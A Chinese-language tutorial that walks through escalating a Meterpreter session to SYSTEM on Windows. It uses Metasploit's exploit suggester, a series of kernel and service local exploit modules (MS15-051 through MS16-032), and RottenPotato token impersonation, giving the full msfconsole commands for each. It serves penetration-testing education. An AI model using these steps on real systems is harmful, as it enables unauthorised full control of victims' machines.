如何進(jìn)行Windows內(nèi)核漏洞利用提權(quán)

如何進(jìn)行Windows內(nèi)核漏洞利用提權(quán)，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來(lái)學(xué)習(xí)下，希望你能有所收獲。

“使用自動(dòng)化腳本進(jìn)行Windows提權(quán)”，本文將介紹有關(guān)Windows內(nèi)核漏洞提權(quán)的方法。我將使用內(nèi)置的Metasploit模塊作為演示。

Windows-Exploit-suggester

Metasploit內(nèi)置模塊提供了各種可用于提權(quán)的local exploits，并會(huì)基于架構(gòu)，平臺(tái)（即運(yùn)行的操作系統(tǒng)），會(huì)話類型和所需默認(rèn)選項(xiàng)提供建議。這極大的節(jié)省了我們的時(shí)間，省去了我們手動(dòng)搜索local exploits的麻煩。雖說(shuō)如此，但也并非所有列出的local exploits都可用。所以，無(wú)論是漏洞利用還是查找最好的辦法就是自動(dòng)結(jié)合手動(dòng)。 

用法

注：要使用local exploit suggester，我們必須已在目標(biāo)機(jī)器上獲取到了一個(gè)Meterpreter session。在運(yùn)行Local Exploit suggester之前，我們需要將現(xiàn)有的Meterpreter session調(diào)到后臺(tái)運(yùn)行（CTRL + Z）

示例，假設(shè)我們現(xiàn)在有一個(gè)Meterpreter session 1

use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit

如下圖所示，它自動(dòng)的為我們匹配出了一些可能的用于易受攻擊目標(biāo)提權(quán)的漏洞利用模塊。

Windows ClientCopyImage Win32k Exploit

Windows內(nèi)核模式驅(qū)動(dòng)程序特權(quán)提升漏洞。此模塊利用了win32k.sys內(nèi)核模式驅(qū)動(dòng)程序中的不正確對(duì)象處理進(jìn)行提權(quán)。

該模塊已在Windows 7 x64和x86，Windows 2008 R2 SP1 x64的易受攻擊版本上進(jìn)行了測(cè)試。

讓我們轉(zhuǎn)到MSF控制臺(tái)并執(zhí)行該漏洞的exploit模塊

use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

Windows TrackPopupMenu Win32k NULL指針解引用

此模塊利用了win32k.sys中的NULL指針解引用，漏洞可通過(guò)TrackPopupMenu函數(shù)進(jìn)行觸發(fā)。在特殊情況下，我們可以濫用在xxxSendMessageTimeout上的NULL指針解引用，來(lái)實(shí)現(xiàn)任意代碼執(zhí)行操作。

該模塊已在Windows XP SP3，Windows Server 2003 SP2，Windows 7 SP1 Windows Server 2008 32位和Windows Server 2008 R2 SP1 64位上進(jìn)行了測(cè)試。

讓我們轉(zhuǎn)到MSF控制臺(tái)并執(zhí)行該漏洞的exploit模塊

use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

通過(guò)KiTrap0D提升Windows權(quán)限

此模塊將通過(guò)KiTrap0D exploit創(chuàng)建具有SYSTEM權(quán)限的新會(huì)話，如果當(dāng)前使用的會(huì)話權(quán)限已提升，則exploit將不會(huì)運(yùn)行。該模塊依賴于kitrap0d.x86.dll，因此在x64版本的Windows上不受支持。

該模塊已在32位的Windows Server 2003，Windows Server 2008，Windows 7和XP易受攻擊版本上進(jìn)行了測(cè)試。

讓我們轉(zhuǎn)到MSF控制臺(tái)并執(zhí)行該漏洞的exploit模塊

use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

Task Scheduler XML提權(quán)

此漏洞發(fā)生在Task Scheduler中，可允許用戶提升權(quán)限。如果攻擊者登錄到受影響的系統(tǒng)，并運(yùn)行特制應(yīng)用程序，則該漏洞可能允許特權(quán)提升。攻擊者必須擁有有效的登錄憑據(jù)，并且能夠在本地登錄才能成功利用此漏洞。遠(yuǎn)程或匿名用戶則無(wú)法利用此漏洞。

該模塊已在Windows Vista，Windows 7，Windows Server 2008 x64和x86的易受攻擊版本上進(jìn)行了測(cè)試。

讓我們轉(zhuǎn)到MSF控制臺(tái)并執(zhí)行該漏洞的exploit模塊

use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

MS16-016 mrxdav.sys WebDav本地提權(quán)

此模塊利用了mrxdav.sys中的漏洞。其將在目標(biāo)系統(tǒng)生成一個(gè)進(jìn)程，并在執(zhí)行payload之前將其權(quán)限提升到NT AUTHORITY\SYSTEM。

該模塊已在Windows 7 SP1，x86架構(gòu)的易受攻擊版本上進(jìn)行了測(cè)試。

讓我們轉(zhuǎn)到MSF控制臺(tái)并執(zhí)行該漏洞的exploit模塊

use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

EPATHOBJ::pprFlattenRec本地提權(quán)

此模塊利用了EPATHOBJ :: pprFlattenRec上的漏洞，其主要問(wèn)題出在使用了未初始化的數(shù)據(jù)（即允許損壞內(nèi)存）。

目前，該模塊已在Windows XP SP3，Windows 2003 SP1和Windows 7 SP1上成功進(jìn)行了測(cè)試。

讓我們轉(zhuǎn)到MSF控制臺(tái)并執(zhí)行該漏洞的exploit模塊

use exploit/windows/local/ppr_flatten_rec
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

MS13-053 : NTUserMessageCall Win32k內(nèi)核池溢出

Win32k中的內(nèi)核池溢出漏洞，可允許本地用戶提權(quán)。內(nèi)核shellcode使winlogon.exe進(jìn)程的ACL為NULL（SYSTEM進(jìn)程）。這將允許任何非特權(quán)進(jìn)程自由遷移到winlogon.exe，從而提升用戶權(quán)限。注意：退出meterpreter會(huì)話時(shí)，可能會(huì)導(dǎo)致winlogon.exe崩潰。

目前，該模塊已在Windows 7 SP1 x86上成功測(cè)試。

讓我們轉(zhuǎn)到MSF控制臺(tái)并執(zhí)行該漏洞的exploit模塊

use exploit/windows/local/ms13_053_ schlamperei
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

MS16-032 Secondary Logon Handle提權(quán)

此模塊利用了Windows Secondary Logon Service中缺少標(biāo)準(zhǔn)句柄過(guò)濾的問(wèn)題。該漏洞主要影響Windows 7-10和2k8-2k12 32/64位版本。此模塊僅適用于具有Powershell 2.0或更高版本的Windows系統(tǒng)，以及具有至少兩個(gè)或以上CPU內(nèi)核的系統(tǒng)。

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
exploit

一旦exploit成功執(zhí)行，就會(huì)打開另一個(gè)Meterpreter session

getsystem
getuid

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

RottenPotato

使用RottenPotato將服務(wù)帳戶本地提權(quán)至SYSTEM。

首先，我們?cè)趍eterpreter會(huì)話中使用以下選項(xiàng)查看當(dāng)前系統(tǒng)上是否存在任何有效tokens。

load incognito
list_token -u

可以看到，當(dāng)前并沒(méi)有任何token可用。

現(xiàn)在，我們從github下載Rottenpotato。

git clone https://github.com/foxglovesec/RottenPotato.git
cd RottenPotato

下載完成后我們會(huì)在Rottenpotato目錄下，看到一個(gè)rottenpotato.exe文件。

將該文件上傳至受害者機(jī)器。

upload /root/Desktop/RottenPotato/rottenpotato.exe .

然后，鍵入以下命令執(zhí)行該exe文件，并將SYSTEM token添加到impersonate user tokens下。

execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

可以看到，我們當(dāng)前的用戶權(quán)限已提升為了NT AUTHORITY\SYSTEM

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注億速云行業(yè)資訊頻道，感謝您對(duì)億速云的支持。